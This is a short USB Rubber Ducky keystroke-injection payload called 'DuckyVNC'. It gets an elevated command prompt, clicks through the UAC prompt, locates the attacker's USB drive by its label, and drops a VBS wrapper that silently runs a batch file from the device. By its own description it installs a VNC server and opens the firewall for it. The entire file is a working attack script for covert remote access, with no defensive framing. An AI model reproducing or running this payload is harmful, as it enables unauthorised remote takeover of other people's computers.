REM Title: DuckyVNC
REM Description: Copy winvnc from Ducky to Home and start. Also add exception to firewall(experimental)
DELAY 5000
GUI r
DELAY 200
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2500
ALT j
DELAY 1000
STRING cd %userprofile%
ENTER
DELAY 100
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "HEISEDUCK"') do set myd=%d
ENTER
DELAY 200
STRING copy /Y con inv.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run "123.bat", 0, False
CTRL z
ENTER
DELAY 100
STRING copy /Y %myd%\123.bat
ENTER
DELAY 200
STRING inv.vbs & exit
ENTER